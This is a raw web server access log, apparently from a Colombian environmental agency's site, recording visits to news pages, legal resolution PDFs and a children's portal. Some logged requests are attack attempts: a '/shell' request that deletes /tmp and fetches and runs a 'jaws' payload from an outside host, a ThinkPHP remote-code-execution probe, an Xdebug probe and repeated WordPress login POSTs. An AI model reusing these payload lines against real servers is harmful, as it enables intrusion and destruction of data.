191.156.146.233 - - [11/Feb/2023:07:47:44 -0500] "GET /tasa-retributiva-por-vertimientos-puntuales-al-agua-hasta-el-10-de-febrero-hay-plazo-para-diligenciar-y-enviar-formulario-de-autodeclaracion.html HTTP/1.1" 200 1030
181.61.39.98 - - [11/Feb/2023:07:48:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:06 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12181
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:48:07 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
216.245.221.92 - - [11/Feb/2023:07:48:18 -0500] "HEAD / HTTP/1.1" 200 -
152.203.128.167 - - [11/Feb/2023:07:49:12 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
172.22.2.4 - - [11/Feb/2023:07:48:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:07:50:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.29.20.85 - - [11/Feb/2023:07:51:12 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
123.30.137.81 - - [11/Feb/2023:07:51:20 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+proxy.akur.group/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [11/Feb/2023:07:49:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [11/Feb/2023:07:53:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:07:54:19 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [11/Feb/2023:07:54:19 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [11/Feb/2023:07:54:19 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [11/Feb/2023:07:54:19 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [11/Feb/2023:07:54:19 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [11/Feb/2023:07:54:19 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [11/Feb/2023:07:54:20 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [11/Feb/2023:07:54:26 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [11/Feb/2023:07:54:26 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [11/Feb/2023:07:54:26 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [11/Feb/2023:07:54:26 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [11/Feb/2023:07:54:26 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9606
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [11/Feb/2023:07:54:33 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [11/Feb/2023:07:54:34 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
173.252.79.15 - - [11/Feb/2023:07:54:50 -0500] "GET /images/IMG_3028%20(1).jpg HTTP/1.1" 200 435206
172.22.2.4 - - [11/Feb/2023:07:55:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4188&usuario=&sector=SILVICULTURA&fecha=2021&resuelve= HTTP/1.1" 200 1104
172.22.2.4 - - [11/Feb/2023:07:55:04 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [11/Feb/2023:07:54:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [11/Feb/2023:07:55:11 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4188&usuario=&sector=SILVICULTURA&fecha=2021&resuelve= HTTP/1.1" 200 1104
132.251.2.18 - - [11/Feb/2023:07:55:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4188.pdf HTTP/1.1" 200 499693
132.251.2.18 - - [11/Feb/2023:07:55:15 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.216.191.101 - - [11/Feb/2023:07:55:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4188.pdf HTTP/1.1" 200 499693
177.91.255.68 - - [11/Feb/2023:07:55:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4188.pdf HTTP/1.1" 200 499693
201.245.192.253 - - [11/Feb/2023:07:55:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [11/Feb/2023:07:54:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.64.49 - - [11/Feb/2023:07:56:47 -0500] "-" 408 -
172.22.2.4 - - [11/Feb/2023:07:55:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
154.89.5.71 - - [11/Feb/2023:07:57:51 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Feb/2023:07:58:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.251 - - [11/Feb/2023:07:59:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/1446.pdf HTTP/1.1" 200 778477
104.236.128.5 - - [11/Feb/2023:07:59:27 -0500] "MGLNDD_190.27.245.106_80" 501 953
200.69.103.230 - - [11/Feb/2023:07:59:34 -0500] "GET /tasa-retributiva-por-vertimientos-puntuales-al-agua-hasta-el-10-de-febrero-hay-plazo-para-diligenciar-y-enviar-formulario-de-autodeclaracion.html HTTP/1.1" 200 1030
173.252.107.1 - - [11/Feb/2023:08:00:12 -0500] "GET /tasa-retributiva-por-vertimientos-puntuales-al-agua-hasta-el-10-de-febrero-hay-plazo-para-diligenciar-y-enviar-formulario-de-autodeclaracion.html HTTP/1.1" 206 1030
173.252.107.12 - - [11/Feb/2023:08:00:13 -0500] "GET /tasa-retributiva-por-vertimientos-puntuales-al-agua-hasta-el-10-de-febrero-hay-plazo-para-diligenciar-y-enviar-formulario-de-autodeclaracion.html HTTP/1.1" 206 1030
173.252.107.13 - - [11/Feb/2023:08:00:14 -0500] "GET /images/vertimiento-Comprimida%20(1).png HTTP/1.1" 200 22870
173.252.83.120 - - [11/Feb/2023:08:00:19 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
173.252.127.18 - - [11/Feb/2023:08:00:24 -0500] "GET /images/1%20de%20febrero%20D\xc3\xada%20sin%20carro.jpeg HTTP/1.1" 404 1034
173.252.107.13 - - [11/Feb/2023:08:00:27 -0500] "GET /tasa-retributiva-por-vertimientos-puntuales-al-agua-hasta-el-10-de-febrero-hay-plazo-para-diligenciar-y-enviar-formulario-de-autodeclaracion.html HTTP/1.1" 206 1030
172.22.2.4 - - [11/Feb/2023:08:00:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9606
201.245.192.253 - - [11/Feb/2023:08:00:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.97 - - [11/Feb/2023:08:01:42 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 438284
173.252.83.8 - - [11/Feb/2023:08:01:50 -0500] "GET /images/Secretaria%20Urrutia%20evento%20h\xc3\xa1bitat%20Francia%2024%20de%20enero.jpeg HTTP/1.1" 404 1034
181.59.3.28 - - [11/Feb/2023:08:01:56 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
172.22.2.4 - - [11/Feb/2023:08:00:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:08:01:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
216.245.221.92 - - [11/Feb/2023:08:03:18 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.23 - - [11/Feb/2023:08:03:27 -0500] "GET /images/Secretaria%20Urrutia%20evento%20h\xc3\xa1bitat%20Francia%2024%20de%20enero.jpeg HTTP/1.1" 404 1034
173.252.79.18 - - [11/Feb/2023:08:03:32 -0500] "GET /images/19%20de%20enero%20\xc3\xa1rbol%20bosque%20San%20Carlos.jpg HTTP/1.1" 404 1034
52.167.144.97 - - [11/Feb/2023:08:03:33 -0500] "GET /bla/resoluciones/autos%202021/0618.pdf HTTP/1.1" 200 411378
51.255.62.9 - - [11/Feb/2023:08:03:44 -0500] "GET /portaldeninos/xmlrpc.php HTTP/1.1" 405 42
51.255.62.14 - - [11/Feb/2023:08:03:44 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [11/Feb/2023:08:03:34 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
201.245.192.253 - - [11/Feb/2023:08:05:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.28.232.61 - - [11/Feb/2023:08:06:34 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.28.232.61 - - [11/Feb/2023:08:06:34 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.28.232.61 - - [11/Feb/2023:08:06:34 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [11/Feb/2023:08:06:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Feb/2023:08:08:18 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.108 - - [11/Feb/2023:08:08:48 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.108 - - [11/Feb/2023:08:08:48 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [11/Feb/2023:08:07:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
172.22.2.4 - - [11/Feb/2023:08:09:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [11/Feb/2023:08:10:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [11/Feb/2023:08:13:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:08:12:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.105 - - [11/Feb/2023:08:14:20 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [11/Feb/2023:08:14:21 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [11/Feb/2023:08:13:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
71.6.158.166 - - [11/Feb/2023:08:15:34 -0500] "-" 408 -
201.245.192.253 - - [11/Feb/2023:08:15:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.101 - - [11/Feb/2023:08:17:21 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [11/Feb/2023:08:17:22 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [11/Feb/2023:08:17:53 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [11/Feb/2023:08:18:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:08:18:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41269
201.245.192.253 - - [11/Feb/2023:08:18:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41460
172.22.2.4 - - [11/Feb/2023:08:17:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
172.22.2.4 - - [11/Feb/2023:08:18:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:08:18:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
201.245.192.253 - - [11/Feb/2023:08:20:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.82 - - [11/Feb/2023:08:20:46 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-p%C3%A1gina-de-ni%C3%B1os7-150x7.jpg HTTP/1.1" 404 75240
181.55.146.98 - - [11/Feb/2023:08:22:31 -0500] "GET /galeria/galeria/fotos/Jaboque3G.jpg HTTP/1.1" 200 422286
181.55.146.98 - - [11/Feb/2023:08:22:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.84.89.190 - - [11/Feb/2023:08:22:46 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.84.89.190 - - [11/Feb/2023:08:22:46 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
216.245.221.92 - - [11/Feb/2023:08:23:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:08:23:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:08:25:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.10 - - [11/Feb/2023:08:26:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/1457.pdf HTTP/1.1" 200 353306
172.22.2.4 - - [11/Feb/2023:08:24:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
66.249.64.45 - - [11/Feb/2023:08:26:45 -0500] "-" 408 -
185.119.81.101 - - [11/Feb/2023:08:28:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [11/Feb/2023:08:28:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [11/Feb/2023:08:28:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:08:28:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41269
201.245.192.253 - - [11/Feb/2023:08:28:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41460
172.22.2.4 - - [11/Feb/2023:08:28:55 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [11/Feb/2023:08:28:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [11/Feb/2023:08:28:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [11/Feb/2023:08:28:55 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [11/Feb/2023:08:28:55 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [11/Feb/2023:08:28:55 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9606
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [11/Feb/2023:08:28:57 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [11/Feb/2023:08:29:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 4867497
172.22.2.4 - - [11/Feb/2023:08:29:15 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
181.54.228.54 - - [11/Feb/2023:08:29:24 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
181.54.228.54 - - [11/Feb/2023:08:29:24 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.54.228.54 - - [11/Feb/2023:08:29:24 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
181.54.228.54 - - [11/Feb/2023:08:29:24 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
172.22.2.4 - - [11/Feb/2023:08:28:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
181.54.228.54 - - [11/Feb/2023:08:29:29 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
181.54.228.54 - - [11/Feb/2023:08:29:29 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
181.54.228.54 - - [11/Feb/2023:08:29:29 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 284404
181.54.228.54 - - [11/Feb/2023:08:29:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0046.pdf HTTP/1.1" 200 405139
181.54.228.54 - - [11/Feb/2023:08:29:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0046.pdf HTTP/1.1" 200 405139
201.245.192.253 - - [11/Feb/2023:08:30:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [11/Feb/2023:08:29:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.49 - - [11/Feb/2023:08:31:26 -0500] "GET /BLA/resoluciones/AUTOS%202018/6554.pdf HTTP/1.1" 200 261001
173.252.127.118 - - [11/Feb/2023:08:31:55 -0500] "GET /images/1%20de%20febrer%20Operativo%20hornos.jpg HTTP/1.1" 200 69569
173.252.127.4 - - [11/Feb/2023:08:31:58 -0500] "GET /images/vertimiento-Comprimida%20(1).png HTTP/1.1" 200 22870
173.252.127.23 - - [11/Feb/2023:08:31:58 -0500] "GET /images/19%20de%20enero%20\xc3\xa1rbol%20bosque%20San%20Carlos.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [11/Feb/2023:08:31:14 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 32715
34.90.225.32 - - [11/Feb/2023:08:32:04 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [11/Feb/2023:08:30:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
181.49.54.2 - - [11/Feb/2023:08:32:30 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.49.54.2 - - [11/Feb/2023:08:32:30 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.49.54.2 - - [11/Feb/2023:08:32:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
173.252.107.14 - - [11/Feb/2023:08:32:42 -0500] "GET /bogota-tendra-la-primera-planta-de-termovalorizacion-de-colombia-la-cual-convertira-los-residuos-en-energia-para-la-ciudad.html HTTP/1.1" 206 883
34.91.65.161 - - [11/Feb/2023:08:33:10 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [11/Feb/2023:08:33:18 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.117 - - [11/Feb/2023:08:33:45 -0500] "GET /bla/resoluciones/autos%202021/0538.pdf HTTP/1.1" 200 344747
181.58.21.103 - - [11/Feb/2023:08:34:28 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
181.58.21.103 - - [11/Feb/2023:08:34:29 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [11/Feb/2023:08:34:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 2526554
181.54.228.54 - - [11/Feb/2023:08:34:36 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.54.228.54 - - [11/Feb/2023:08:34:41 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 438284
181.54.228.54 - - [11/Feb/2023:08:35:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
201.245.192.253 - - [11/Feb/2023:08:35:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [11/Feb/2023:08:35:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
49.249.49.226 - - [11/Feb/2023:08:37:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2910.pdf HTTP/1.1" 200 415694
